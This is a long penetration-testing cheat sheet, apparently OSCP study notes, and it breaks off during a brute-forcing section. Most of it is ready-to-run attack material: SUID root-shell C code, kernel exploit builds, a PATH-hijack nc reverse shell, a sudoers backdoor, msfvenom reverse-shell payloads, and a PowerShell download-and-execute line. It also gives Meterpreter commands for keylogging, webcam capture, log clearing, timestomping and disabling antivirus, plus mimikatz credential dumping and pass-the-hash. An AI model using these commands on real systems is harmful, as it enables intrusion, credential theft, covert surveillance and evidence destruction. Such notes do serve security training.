What files run as root / SUID / GUID?: find / -perm +2000 -user root -type f -print find / -perm -1000 -type d 2>/dev/null # Sticky bit - Only the owner of the directory or the owner of a file can delete or rename here. find / -perm -g=s -type f 2>/dev/null # SGID (chmod 2000) - run as the group, not the user who started it. find / -perm -u=s -type f 2>/dev/null # SUID (chmod 4000) - run as the owner, not the user who started it. find / -perm -g=s -o -perm -u=s -type f 2>/dev/null # SGID or SUID for i in locate -r "bin$"; do find $i ( -perm -4000 -o -perm -2000 ) -type f 2>/dev/null; done find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 3 -exec ls -ld {} ; 2>/dev/null
What folders are world writeable?: find / -writable -type d 2>/dev/null # world-writeable folders find / -perm -222 -type d 2>/dev/null # world-writeable folders find / -perm -o w -type d 2>/dev/null # world-writeable folders find / -perm -o x -type d 2>/dev/null # world-executable folders find / ( -perm -o w -perm -o x ) -type d 2>/dev/null # world-writeable & executable folders
There are a few scripts that can automate the linux enumeration process: Google is my favorite Linux Kernel exploitation search tool. Many of these automated checkers are missing important kernel exploits which can create a very frustrating blindspot during your OSCP course.
LinuxPrivChecker.py - My favorite automated linux priv enumeration checker - https://www.securitysift.com/download/linuxprivchecker.py
LinEnum - (Recently Updated) https://github.com/rebootuser/LinEnum
linux-exploit-suggester (Recently Updated) https://github.com/mzet-/linux-exploit-suggester
Highon.coffee Linux Local Enum - Great enumeration script! wget https://highon.coffee/downloads/linux-local-enum.sh
Linux Privilege Exploit Suggester (Old has not been updated in years) https://github.com/PenturaLabs/Linux_Exploit_Suggester
Linux post exploitation enumeration and exploit checking tools https://github.com/reider-roque/linpostexp
####Handy Kernel Exploits####
CVE-2010-2959 - 'CAN BCM' Privilege Escalation - Linux Kernel < 2.6.36-rc1 (Ubuntu 10.04 / 2.6.32) https://www.exploit-db.com/exploits/14814/ wget -O i-can-haz-modharden.c http://www.exploit-db.com/download/14814 $ gcc i-can-haz-modharden.c -o i-can-haz-modharden $ ./i-can-haz-modharden [+] launching root shell!
id
uid=0(root) gid=0(root)
CVE-2010-3904 - Linux RDS Exploit - Linux Kernel <= 2.6.36-rc8 https://www.exploit-db.com/exploits/15285/
CVE-2012-0056 - Mempodipper - Linux Kernel 2.6.39 < 3.2.2 (Gentoo / Ubuntu x86/x64) https://git.zx2c4.com/CVE-2012-0056/about/ Linux CVE 2012-0056 wget -O exploit.c http://www.exploit-db.com/download/18411 gcc -o mempodipper exploit.c ./mempodipper
CVE-2016-5195 - Dirty Cow - Linux Privilege Escalation - Linux Kernel <= 3.19.0-73.8 https://dirtycow.ninja/ First existed on 2.6.22 (released in 2007) and was fixed on Oct 18, 2016
Run a command as a user other than root sudo -u haxzor /usr/bin/vim /etc/apache2/sites-available/000-default.conf
Add a user or change a password /usr/sbin/useradd -p 'openssl passwd -1 thePassword' haxzor echo thePassword | passwd haxzor --stdin
####Local Privilege Escalation Exploit in Linux####
SUID (Set owner User ID up on execution) Often SUID C binary files are required to spawn a shell as a superuser, you can update the UID / GID and shell as required.
below are some quick copy and paste examples for various shells:
SUID C Shell for /bin/bash
int main(void){ setresuid(0, 0, 0); system("/bin/bash"); }
SUID C Shell for /bin/sh
int main(void){ setresuid(0, 0, 0); system("/bin/sh"); }
Building the SUID Shell binary gcc -o suid suid.c For 32 bit: gcc -m32 -o suid suid.c
####Create and compile an SUID from a limited shell (no file transfer)####
echo "int main(void){\nsetgid(0);\nsetuid(0);\nsystem("/bin/sh");\n}" >privsc.c gcc privsc.c -o privsc
Handy command if you can get a root user to run it. Add the www-data user to Root SUDO group with no password requirement: echo 'chmod 777 /etc/sudoers && echo "www-data ALL=NOPASSWD:ALL" >> /etc/sudoers && chmod 440 /etc/sudoers' > /tmp/update
You may find a command is being executed by the root user, you may be able to modify the system PATH environment variable to execute your command instead. In the example below, ssh is replaced with a reverse shell SUID connecting to 10.10.10.1 on port 4444. set PATH="/tmp:/usr/local/bin:/usr/bin:/bin" echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.1 4444 >/tmp/f" >> /tmp/ssh chmod +x ssh
####SearchSploit####
searchsploit –uncsearchsploit apache 2.2 searchsploit "Linux Kernel" searchsploit linux 2.6 | grep -i ubuntu | grep local searchsploit slmail
Kernel Exploit Suggestions for Kernel Version 3.0.0 ./usr/share/linux-exploit-suggester/Linux_Exploit_Suggester.pl -k 3.0.0
Precompiled Linux Kernel Exploits - Super handy if GCC is not installed on the target machine! https://www.kernel-exploits.com/
Collect root password cat /etc/shadow |grep root
Find and display the proof.txt or flag.txt - LOOT! cat find / -name proof.txt -print
Finding exploit code http://www.exploit-db.com http://1337day.com http://www.securiteam.com http://www.securityfocus.com http://www.exploitsearch.net http://metasploit.com/modules/ http://securityreason.com http://seclists.org/fulldisclosure/ http://www.google.com
Finding more information regarding the exploit http://www.cvedetails.com http://packetstormsecurity.org/files/cve/[CVE] http://cve.mitre.org/cgi-bin/cvename.cgi?name=[CVE] http://www.vulnview.com/cve-details.php?cvename=[CVE]
(Quick) "Common" exploits. Warning. Pre-compiled binaries files. Use at your own risk http://tarantula.by.ru/localroot/ http://www.kecepatan.66ghz.com/file/local-root-exploit-priv9/
METASPLOIT
See Metasploit Unleashed Course
Search for exploits using Metasploit GitHub framework source code: https://github.com/rapid7/metasploit-framework Translate them for use on OSCP LAB or EXAM.
Metasploit MetaSploit requires Postfresql systemctl start postgresql
To enable Postgresql on startup systemctl enable postgresql
MSF Syntax Start metasploit msfconsole msfconsole -q
Show help for command show -h
Show Auxiliary modules show auxiliary
Use a module use auxiliary/scanner/snmp/snmp_enum use auxiliary/scanner/http/webdav_scanner use auxiliary/scanner/smb/smb_version use auxiliary/scanner/ftp/ftp_login use exploit/windows/pop3/seattlelab_pass
Show the basic information for a module info
Show the configuration parameters for a module show options
Set options for a module set RHOSTS 192.168.1.1-254 set THREADS 10
Run the module run
Execute an Exploit exploit
Search for a module search type:auxiliary login
Metasploit Database Access Show all hosts discovered in the MSF database hosts
Scan for hosts and store them in the MSF database db_nmap
Search machines for specific ports in MSF database services -p 443
Leverage MSF database to scan SMB ports (auto-completed rhosts) services -p 443 --rhosts
You may find some boxes that are vulnerable to MS17-010 (AKA. EternalBlue). Although, not offically part of the indended course, this exploit can be leveraged to gain SYSTEM level access to a Windows box. I have never had much luck using the built in Metasploit EternalBlue module. I found that the elevenpaths version works much more relabily. Here are the instructions to install it taken from the following YouTube video: https://www.youtube.com/watch?v=4OHLor9VaRI
First step is to configure the Kali to work with wine 32bit
dpkg --add-architecture i386 && apt-get update && apt-get install wine32 rm -r ~/.wine wine cmd.exe exit
Download the exploit repostory https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit
Move the exploit to /usr /share /metasploit-framework /modules /exploits /windows /smb
Start metasploit console (spoolsv.exe as the PROCESSINJECT yielded results on OSCP boxes.)
use exploit/windows/smb/eternalblue_doublepulsar msf exploit(eternalblue_doublepulsar) > set RHOST 10.10.10.10 RHOST => 10.11.1.73 msf exploit(eternalblue_doublepulsar) > set PROCESSINJECT spoolsv.exe PROCESSINJECT => spoolsv.exe msf exploit(eternalblue_doublepulsar) > run
####Experimenting with Meterpreter####
Get system information from Meterpreter Shell sysinfo
Get user id from Meterpreter Shell getuid
Search for a file search -f *pass*.txt
Upload a file upload /usr/share/windows-binaries/nc.exe c:\\Users\\Offsec
Download a file download c:\\Windows\\system32\\calc.exe /tmp/calc.exe
Invoke a command shell from Meterpreter Shell shell
Exit the meterpreter shell exit
Metasploit Exploit Multi Handler multi/handler to accept an incoming reverse_https_meterpreter
payload use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_https set LHOST $ip set LPORT 443 exploit [*] Started HTTPS reverse handler on https://$ip:443/
Building Your Own MSF Module mkdir -p ~/.msf4/modules/exploits/linux/misc cd ~/.msf4/modules/exploits/linux/misc cp /usr/share/metasploitframework/modules/exploits/linux/misc/gld\_postfix.rb ./crossfire.rb nano crossfire.rb
Post Exploitation with Metasploit - (available options depend on OS and Meterpreter Cababilities)
downloadDownload a file or directoryuploadUpload a file or directoryportfwdForward a local port to a remote servicerouteView and modify the routing tablekeyscan_startStart capturing keystrokeskeyscan_stopStop capturing keystrokesscreenshotGrab a screenshot of the interactive desktoprecord_micRecord audio from the default microphone for X secondswebcam_snapTake a snapshot from the specified webcamgetsystemAttempt to elevate your privilege to that of local system.hashdumpDumps the contents of the SAM database
####Materpreter Study Notes
Baisc system commands
background # placed in the background of the current session Sessions # Sessions to see -h help sessions -i # kill -k session into the session bgrun / RUN # implementation of the existing module, double-click the tab enter the run, has been listed Some scripts info # View existing module information getuid # View current user identity getprivs # View current user permissions getpid # Get current process ID (PID) sysinfo # View target machine system information irb # Open ruby terminal ps # View is running Process kill # Kill the specified PID process idletime # View target idle time reboot / shutdown # Restart / Shutdown shell # Enter target cmd shell
Common cmd commands
Whoami # Current privilege quser # Query current online administrator net user # View existing user net user username/password/add # Add user and corresponding password net localgroup User group name username/add # Add the specified user to the specified user group netstat -ano # Query the current network connection communication in the computer, LISTENING indicates that the port is in the listening state; ESTABLISHED indicates that the port is in the working (communication) state systeminfo # View the details of the current computer tasklist /svc # View each process corresponding to services taskkill / f / im program name # name of the end of a specified program taskkill / f / PID ID # end of a specified process PID tasklist | findstr "string" # Find content specified output logoff # cancellation of a Specify the user's ID shutdown -r # Restart the current computer netsh adcfirewall setAllprofiles state off # Turn off the firewall
Uictl switch keyboard / mouse
Uictl [ enable/disable ] [ keyboard/mouse/all ] # enable or disable keyboard/mouse uictl disable mouse # disable mouse uictl disable keyboard # disable keyboard
Execute executable file
the Execute # executable file on the target machine execute -H -i -f cmd.exe create a new process cmd.exe #, -H invisible, -i interactive execute -H -m -d notepad.exe -f payload.exe - a "-o hack.txt"
-d Process name displayed during execution of the target host (for masquerading) -m Direct execution from memory
"-o hack.txt" is the running parameter of payload.exe
Migrate process migration
Getpid # Get the current process's pid ps # View the current active process migrate # Migrate the Meterpreter session to the specified pid value in the process kill #kill the process
Clearav clear log
Clearav # Clear application logs, system logs, security logs in windows
Timestomp forged timestamp
Timestomp C: \ -h View help timestomp -v C: \ 2 .txt View timestamp timestomp C: \ 2 .txt -f C: \ 1 .txt #Copy the timestamp of 1.txt Give 2. txt timestomp c: \ test \ 22 .txt -z "03/10/2019 11:55:55" -v # Set the four properties to uniform time
Portfwd port forwarding
Portfwd add -l 1111 -p 3389 -r 127 .0.0.1 #Forward the 3389 port of the target machine to the local port 1111 rdesktop 127 .0.0.1:1111 # Need to enter the username and password to connect rdesktop -u Administrator -p 123 127 .0.0.1:1111 # -u username -p password
Autoroute add route
run autoroute -h # View help run get_local_subnets # View target intranet segment address run autoroute -s 192 .168.183.0/24 # Add target network segment route run autoroute -p # View added route run post/windows/gather/arp_scanner RHOSTS = 192 .168.183.0/24 run auxiliary/scanner/portscan/tcp RHOSTS = 192 .168.183.146 PORTS = 3389
Socks agent
Reference: https://www.freebuf.com/articles/network/125278.html use auxiliary/server/socks4a set srvhost 127 .0.0.1 set srvport 2000 run
Common script
Run arp_scanner -r 192 .168.183.1/24 # Use arp for surviving host scan run winenum # automate some detection scripts run credcollect # get user hash run domain_list_gen # get domain management account list run post/multi/gather/env # get User environment variable run post/windows/gather/enum_logged_on_users -c # List current login user run post/linux/gather/checkvm # virtual machine run post/windows/gather/checkvm # virtual machine run post/windows/gather/ Forensics/enum_drives # View memory information run post/windows/gather/enum_applications # Get installation software information run post/windows/gather/dumplinks # Get recently accessed documents, link information run post/windows/gather/enum_ie # Get IE cache run post/windows/gather/enum_firefox # Get firefox cache run post/windows/gather/enum_chrome # Get Chrome cache run post/multi/recon/local_exploit_suggester # Get local privilege vulnerability run post/windows/gather/enum_patches # Get patch information run post/windows/gather/enum_domain # Find domain control run post/windows/gather/enum_snmp # Get snmp community name run post/windows/gather/credentials/vnc # Get vnc password run post/windows/wlan/ Wlan_profile # Used to read the target host WiFi password run post/multi/gather/wlan_geolocate # Based on wlan, the location confirmation file is located at /root/.msf4/loot run post/windows/manage/killav close antivirus software
Common crack module
Auxiliary/scanner/mssql/mssql_login Auxiliary/scanner/ftp/ftp_login Auxiliary/scanner/ssh/ssh_login Auxiliary/scanner/telnet/telnet_login Auxiliary/scanner/smb/smb_login Auxiliary/scanner/mssql/mssql_login Auxiliary/scanner/mysql/mysql_login Auxiliary/scanner/oracle/oracle_login Auxiliary/scanner/postgres/postgres_login Auxiliary/scanner/vnc/vnc_login Auxiliary/scanner/pcanywhere/pcanywhere_login Auxiliary/scanner/snmp/snmp_login Auxiliary/scanner/ftp/anonymous
Keylogger
Keyscan_start # Start key record keyscan_dump # Export record data keyscan_stop # End key record
Sniffer capture package
Use sniffer Sniffer_interfaces # View NIC sniffer_start 1 # Select NIC 1 to start capturing sniffer_stats 1 # View NIC 1 status sniffer_dump 1 /tmp/wlan1.pcap # Export pcap packet sniffer_stop 1 # Stop NIC 1 capture sniffer_release 1 # Release NIC 1 traffic
Webcam
record_mic # audio recording webcam_chat # open a video chat (the other party pop) webcam_list # view camera webcam_snap # through the camera to take pictures webcam_stream # open by video surveillance cameras (to monitor ≈ live as a web page)
Screen capture
Screenshot # Screenshots use espia # Use espia module screengrab # screenshot
Getgui command
run getgui –h # View help run getgui -e # Open remote desktop run getgui -u admin -p admin # Add user run getgui -f 6666 -e # 3389 port forward to 6666
CORE COMMANDS ? - help menu background - moves the current session to the background bgkill - kills a background meterpreter script bglist - provides a list of all running background scripts bgrun - runs a script as a background thread channel - displays active channels close - closes a channel exit - terminates a meterpreter session help - help menu interact - interacts with a channel irb - go into Ruby scripting mode migrate - moves the active process to a designated PID quit - terminates the meterpreter session read - reads the data from a channel run - executes the meterpreter script designated after it use - loads a meterpreter extension write - writes data to a channel
FILE SYSTEM COMMANDS cat - read and output to stdout the contents of a file cd - change directory on the victim del - delete a file on the victim download - download a file from the victim system to the attacker system edit - edit a file with vim getlwd - print the local directory getwd - print working directory lcd - change local directory lpwd - print local directory ls - list files in current directory mkdir - make a directory on the victim system pwd - print working directory rm - delete a file rmdir - remove directory on the victim system upload - upload a file from the attacker system to the victim
NETWORK COMMANDS ipconfig - displays network interfaces with key information including IP address, etc. portfwd - forwards a port on the victim system to a remote service route - view or modify the victim routing table
SYSTEM COMMANDS clearav - clears the event logs on the victim's computer drop_token - drops a stolen token execute - executes a command getpid - gets the current process ID (PID) getprivs - gets as many privileges as possible getuid - get the user that the server is running as kill - terminate the process designated by the PID ps - list running processes reboot - reboots the victim computer reg - interact with the victim's registry rev2self - calls RevertToSelf() on the victim machine shell - opens a command shell on the victim machine shutdown - shuts down the victim's computer steal_token - attempts to steal the token of a specified (PID) process sysinfo - gets the details about the victim computer such as OS and name
User Interface Commands enumdesktops - lists all accessible desktops getdesktop - get the current meterpreter desktop idletime - checks to see how long since the victim system has been idle keyscan_dump - dumps the contents of the software keylogger keyscan_start - starts the software keylogger when associated with a process such as Word or browser keyscan_stop - stops the software keylogger screenshot - grabs a screenshot of the meterpreter desktop set_desktop - changes the meterpreter desktop uictl - enables control of some of the user interface components
PRIVILAGE ESCALATION COMMANDS getsystem - uses 15 built-in methods to gain sysadmin privileges
PASSWORD DUMP COMMAND hashdump - grabs the hashes in the password (SAM) file
TIMESTOMP COMMAND timestomp - manipulates the modify, access, and create attributes of a file
[+] Creating Metasploit Payloads
List payloads msfvenom -l
Binaries
Linux msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f elf > shell.elf
Windows msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe > shell.exe
Mac msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f macho > shell.macho
Web Payloads
PHP msfvenom -p php/meterpreter_reverse_tcp LHOST= LPORT= -f raw > shell.php cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php
ASP msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f asp > shell.asp
JSP msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f raw > shell.jsp
WAR msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f war > shell.war
Scripting Payloads
Python msfvenom -p cmd/unix/reverse_python LHOST= LPORT= -f raw > shell.py
Bash msfvenom -p cmd/unix/reverse_bash LHOST= LPORT= -f raw > shell.sh
Perl msfvenom -p cmd/unix/reverse_perl LHOST= LPORT= -f raw > shell.pl
Shellcode
For all shellcode see ‘msfvenom –help-formats’ for information as to valid parameters. Msfvenom will output code that is able to be cut and pasted in this language for your exploits.
Linux Based Shellcode msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f
Windows Based Shellcode msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f
Mac Based Shellcode msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f
Handlers
Metasploit handlers can be great at quickly setting up Metasploit to be in a position to receive your incoming shells. Handlers should be in the following format.
use exploit/multi/handler set PAYLOAD set LHOST set LPORT set ExitOnSession false exploit -j -z
Once the required values are completed the following command will execute your handler – ‘msfconsole -L -r ‘
-------------------------------------------------------------------------- Reminders
LOG EVERYTHING!
Metasploit - spool /home//.msf3/logs/console.log Save contents from each terminal! Linux - script myoutput.txt # Type exit to stop
[+] Disable network-manager service network-manager stop
[+] Set IP address ifconfig eth0 192.168.50.12/24
[+] Set default gateway route add default gw 192.168.50.9
[+] Set DNS servers echo "nameserver 192.168.100.2" >> /etc/resolv.conf
[+] Show routing table Windows - route print Linux - route -n
[+] Add static route Linux - route add -net 192.168.100.0/24 gw 192.16.50.9 Windows - route add 0.0.0.0 mask 0.0.0.0 192.168.50.9
[+] Subnetting easy mode ipcalc 192.168.0.1 255.255.255.0
[+] Windows SAM file locations c:\windows\system32\config c:\windows\repair bkhive system /root/hive.txt samdump2 SAM /root/hive.txt > /root/hash.txt
[+] Python Shell python -c 'import pty;pty.spawn("/bin/bash")'
-------------------------------------------------------------------------- Internet Host/Network Enumeration
[+] WHOIS Querying whois www.domain.com
[+] Resolve an IP using DIG dig @8.8.8.8 securitymuppets.com
[+] Find Mail servers for a domain dig @8.8.8.8 securitymuppets.com -t mx
[+] Find any DNS records for a domain dig @8.8.8.8 securitymuppets.com -t any
[+] Zone Transfer dig @192.168.100.2 securitymuppets.com -t axfr host -l securitymuppets.com 192.168.100.2 nslookup / ls -d domain.com.local
[+] Fierce fierce -dns -file <output_file> fierce -dns -dnsserver fierce -range -dnsserver fierce -dns -wordlist
-------------------------------------------------------------------------- IP Network scanning
[+] ARP Scan arp-scan 192.168.50.8/28 -I eth0
[+] NMAP Scans
[+] Nmap ping scan sudo nmap –sn -oA nmap_pingscan 192.168.100.0/24 (-PE)
[+] Nmap SYN/Top 100 ports Scan nmap -sS -F -oA nmap_fastscan 192.168.0.1/24
[+] Nmap SYN/Version All port Scan - ## Main Scan sudo nmap -sV -PN -p0- -T4 -A --stats-every 60s --reason -oA nmap_scan 192.168.0.1/24
[+] Nmap SYN/Version No Ping All port Scan sudo nmap -sV -Pn -p0- --exclude 192.168.0.1 --reason -oA nmap_scan 192.168.0.1/24
[+] Nmap UDP All port scan - ## Main Scan sudo nmap -sU -p0- --reason --stats-every 60s --max-rtt-timeout=50ms --max-retries=1 -oA nmap_scan 192.168.0.1/24
[+] Nmap UDP/Fast Scan nmap -F -sU -oA nmap_UDPscan 192.168.0.1/24
[+] Nmap Top 1000 port UDP Scan nmap -sU -oA nmap_UDPscan 192.168.0.1/24
[+] HPING3 Scans hping3 -c 3 -s 53 -p 80 -S 192.168.0.1 Open = flags = SA Closed = Flags = RA Blocked = ICMP unreachable Dropped = No response
[+] Source port scanning nmap -g (88 (Kerberos) port 53 (DNS) or 67 (DHCP)) Source port also doesn't work for OS detection.
[+] Speed settings -n Disable DNS resolution -sS TCP SYN (Stealth) Scan -Pn Disable host discovery -T5 Insane time template --min-rate 1000 1000 packets per second --max-retries 0 Disable retransmission of timed-out probes
[+] Netcat (swiss army knife)
Connect mode (ncat is client) | default port is 31337
ncat []
Listen mode (ncat is server) | default port is 31337
ncat -l [] []
Transfer file (closes after one transfer)
ncat -l [] [] < file
Transfer file (stays open for multiple transfers)
ncat -l --keep-open [] [] < file
Receive file
ncat [] [] > file
Brokering | allows for multiple clients to connect
ncat -l --broker [] []
Listen with SSL | many options, use ncat --help for full list
ncat -l --ssl [] []
Access control
ncat -l --allow ncat -l --deny
Proxying
ncat --proxy [:] --proxy-type {http | socks4} []
Chat server | can use brokering for multi-user chat
ncat -l --chat [] []
-------------------------------------------------------------------------- Cisco/Networking Commands
? - Help
User mode
- Privileged mode
router(config)# - Global Configuration mode
enable secret more secure than enable password.
For example, in the configuration command: enable secret 5 $1$iUjJ$cDZ03KKGh7mHfX2RSbDqP. The enable secret has been hashed with MD5, whereas in the command: username jdoe password 7 07362E590E1B1C041B1E124C0A2F2E206832752E1A01134D The password has been encrypted using the weak reversible algorithm.
enable - Change to privileged mode to view configs config terminal/config t - Change to global config mode to modify
#show version - Gives you the router's configuration register (Firmware) #show running-config - Shows the router, switch, or firewall's current configuration #show ip route - show the router's routing table #show tech-support - Dump config but obscure passwords
-------------------------------------------------------------------------- Remote Information Services
[+] DNS Zone Transfer - host -l securitymuppets.com 192.168.100.2 Metasploit Auxiliarys: auxiliary/gather/enum_dns use auxiliary/gather/dns...
[+] Finger - Enumerate Users finger @192.168.0.1 finger -l -p user@ip-address auxiliary/scanner/finger/finger_users
[+] NTP Metasploit Auxiliarys
[+] SNMP onesixtyone -c /usr/share/doc/onesixtyone/dict.txt Metasploit Module snmp_enum snmpcheck -t snmpservice
[+] rservices rwho 192.168.0.1 rlogin -l root 192.168.0.17
[+] RPC Services rpcinfo -p Endpoint_mapper metasploit
-------------------------------------------------------------------------- Web Services
[+] WebDAV Metasploit Auxiliarys Upload shell to Vulnerable WebDAV directory: msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.20 LPORT=4444 R | msfencode -t asp -o shell.asp cadaver http://192.168.0.60/ put shell.asp shell.txt copy shell.txt shell.asp;.txt Start reverse handler - browse to http://192.168.0.60/shell.asp;.txt
[+] Nikto Web Scanner
To scan a particular host
perl nikto.pl -host [host IP/name]
To scan a host on multiple ports (default = 80)
perl nikto.pl -host [host IP/name] -port [port number 1], [port number 2], [port number 3]
To scan a host and output fingerprinted information to a file
perl nikto.pl -host [host IP/name] -output [output_file]
To use a proxy while scanning a host
perl nikto.pl -host [host IP/name] -useproxy [proxy address]
-------------------------------------------------------------------------- Windows Networking Services
[+] Get Domain Information: nltest /DCLIST:DomainName nltest /DCNAME:DomainName nltest /DSGETDC:DomainName
[+] Netbios Enumeration nbtscan -r 192.168.0.1-100 nbtscan -f hostfiles.txt
[+] enum4linux
[+] RID Cycling use auxiliary/scanner/smb/smb_lookupsid
[+] Null Session in Windows net use \192.168.0.1\IPC$ "" /u:""
[+] Null Session in Linux smbclient -L //192.168.99.131
-------------------------------------------------------------------------- Accessing Email Services
Metasploit Auxiliarys
[+] SMTP Open Relay Commands
[-] ncat -C 86.54.23.178 25 [-] HELO mail.co.uk [-] MAIL FROM: Attacker@mail.co.uk [-] RCPT TO: Victim@email.com [-] DATA Test Email - some malicious stuff!
-------------------------------------------------------------------------- VPN Testing
[+] ike-scan ike-scan 192.168.207.134 sudo ike-scan -A 192.168.207.134 sudo ike-scan -A 192.168.207.134 --id=myid -P192-168-207-134key
[+] pskcrack psk-crack -b 5 192-168-207-134key psk-crack -b 5 --charset="01233456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz" 192-168-207-134key psk-crack -d /path/to/dictionary 192-168-207-134key
-------------------------------------------------------------------------- Unix RPC
[+] NFS Mounts
Metasploit : auxiliary/scanner/nfs/nfsmount
rpcinfo -p 192.168.0.10
showmount -e 192.168.0.10 mount 192.168.0.10:/secret /mnt/share/
ssh-keygen mkdir /tmp/r00t mount -t nfs 192.168.0.10:/secret /mnt/share/ cat ~/.ssh/id_rsa.pub >> /mnt/share/root/.ssh/authorized_keys umount /mnt/share ssh root@192.168.0.10
-------------------------------------------------------------------------- Post Exploitation
[+] Command prompt access on Windows Host
pth-winexe -U Administrator% // cmd.exe
[+] Add Linux User /usr/sbin/useradd –g 0 –u 0 –o user echo user:password | /usr/sbin/chpasswd
[+] Add Windows User net user username password@1 /add net localgroup administrators username /add
[+] Solaris Commands useradd -o user passwd user usermod -R root user
[+] Dump remote SAM: PwDump.exe -u localadmin 192.168.0.1
[+] Mimikatz mimikatz # privilege::debug mimikatz # sekurlsa::logonPasswords full
[+] Meterpreter meterpreter> run winenum meterpreter> use post/windows/gather/smart_hashdump
meterpreter > use incognito meterpreter > list_tokens -u meterpreter > impersonate_token TVM\domainadmin meterpreter > add_user hacker password1 -h 192.168.0.10 meterpreter > add_group_user "Domain Admins" hacker -h 192.168.0.10
meterpreter > load mimikatz meterpreter > wdigest meterpreter > getWdigestPasswords Migrate if does not work!
[+] Kitrap0d Download vdmallowed.exe and vdmexploit.dll to victim Run vdmallowed.exe to execute system shell
[+] Windows Information On Windows: ipconfig /all systeminfo net localgroup administrators net view net view /domain
[+] SSH Tunnelling Remote forward port 222 ssh -R 127.0.0.1:4444:10.1.1.251:222 -p 443 root@192.168.10.118
-------------------------------------------------------------------------- Metasploit
To show all exploits that for a vulnerability
grep show exploits
To select an exploit to use
use
To see the current settings for a selected exploit
show options
To see compatible payloads for a selected exploit
show payloads
To set the payload for a selected exploit
set payload
To set setting for a selected exploit
set
To run the exploit
exploit
One liner to create/generate a payload for windows
msfvenom --arch x86 --platform windows --payload windows/meterpreter/reverse_tcp LHOST=<listening_host> LPORT=<listening_port> --bad-chars “\x00” --encoder x86/shikata_ga_nai --iterations 10 --format exe --out /path/
One liner start meterpreter
msfconsole -x "use exploit/multi/handler;set payload windows/meterpreter/reverse_tcp;set LHOST <listening_host>;set LPORT <listening_port>;run;"
----------------- [+] Metasploit Pivot
Compromise 1st machine
meterpreter> run arp_scanner -r 10.10.10.0/24
route add 10.10.10.10 255.255.255.248 use auxiliary/scanner/portscan/tcp use bind shell
or run autoroute:
meterpreter > ipconfig
meterpreter > run autoroute -s 10.1.13.0/24
meterpreter > getsystem
meterpreter > run hashdump
use auxiliary/scanner/portscan/tcp
msf auxiliary(tcp) > use exploit/windows/smb/psexec
or port forwarding:
meterpreter > run autoroute -s 10.1.13.0/24
use auxiliary/scanner/portscan/tcp
meterpreter > portfwd add -l -p -r <remote/internal host>
or socks proxy: route add 10.10.10.10 255.255.255.248 use auxiliary/server/socks4a Add proxy to /etc/proxychains.conf proxychains nmap -sT -T4 -Pn 10.10.10.50 setg socks4:127.0.0.1:1080
----------------- [+] Pass the hash
If NTML only: 00000000000000000000000000000000:8846f7eaee8fb117ad06bdd830b7586c
STATUS_ACCESS_DENIED (Command=117 WordCount=0): This can be remedied by navigating to the registry key, "HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\LanManServer\Parameters" on the target systems and setting the value of "RequireSecuritySignature" to "0"
Run hashdump on the first compromised machine: run post/windows/gather/hashdump
Run Psexec module and specify the hash: use exploit/windows/smb/psexec
----------------- [+] Enable RDP: meterpreter > run getgui -u hacker -p s3cr3t Clean up command: meterpreter > run multi_console_command -rc /root/.msf3/logs/scripts/getgui/clean_up__20110112.2448.rc
----------------- [+] AutoRunScript Automatically run scripts before exploiation: set AutoRunScript "migrate explorer.exe"
[+] Set up SOCKS proxy in MSF
[+] Run a post module against all sessions resource /usr/share/metasploit-framework/scripts/resource/run_all_post.rc
[+] Find local subnets 'Whilst in meterpreter shell' meterpreter > run get_local_subnets
Add the correct Local host and Local port parameters
echo "Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.0.7 -Lport 443 -Force" >> /var/www/payload
Set up psexec module on metasploit
auxiliary/admin/smb/psexec_command set command powershell -Exec Bypass -NoL -NoProfile -Command IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.9/payload')
Start reverse Handler to catch the reverse connection
Module options (exploit/multi/handler): Payload options (windows/meterpreter/reverse_https):
Name Current Setting Required Description
EXITFUNC process yes Exit technique: seh, thread, process, none LHOST 192.168.0.9 yes The local listener hostname LPORT 443 yes The local listener port
Show evasion module options
show evasion
[+] Metasploit Shellcode msfvenom -p windows/shell_bind_tcp -b '\x00\x0a\x0d'
-------------------------------------------------------------------------- File Transfer Services
[+] Start TFTPD Server atftpd --daemon --port 69 /tmp
[+] Connect to TFTP Server tftp 192.168.0.10 put / get files
-------------------------------------------------------------------------- LDAP Querying
Tools: ldapsearch LDAPExplorertool2
Anonymous Bind: ldapsearch -h ldaphostname -p 389 -x -b "dc=domain,dc=com"
Authenticated: ldapsearch -h 192.168.0.60 -p 389 -x -D "CN=Administrator, CN=User, DC=, DC=com" -b "DC=, DC=com" -W
Useful Links: http://www.lanmaster53.com/2013/05/public-facing-ldap-enumeration/ http://blogs.splunk.com/2009/07/30/ldapsearch-is-your-friend/
-------------------------------------------------------------------------- Password Attacks Convert multiple webpages into a word list:
for x in 'index' 'about' 'post' 'contact' ; do curl
http://$ip/$x.html | html2markdown | tr -s ' ' '\\n' >>
webapp.txt ; doneOr convert html to word list dict html2dic index.html.out | sort -u > index-html.dict
[+] Bruteforcing http password prompts medusa -h <ip/host> -u -P -M http -n -m DIR:/ -T 30
[+] Medusa
To display all currently installed modules
medusa -d
Display specific options for a module
medusa -M [module_name] -q
Test all passwords in password file against the admin user on the host
192.168.1.20 via the SMB | SSH | MySQL | HTTP service
medusa -h 192.168.1.20 -u admin -P passwords.txt -M [smbnt | ssh | mssql | http]
To brute force 10 hosts and 5 users concurrently (using Medusa's parallel features)
Each of the 5 threads targeting a host will check a specific user
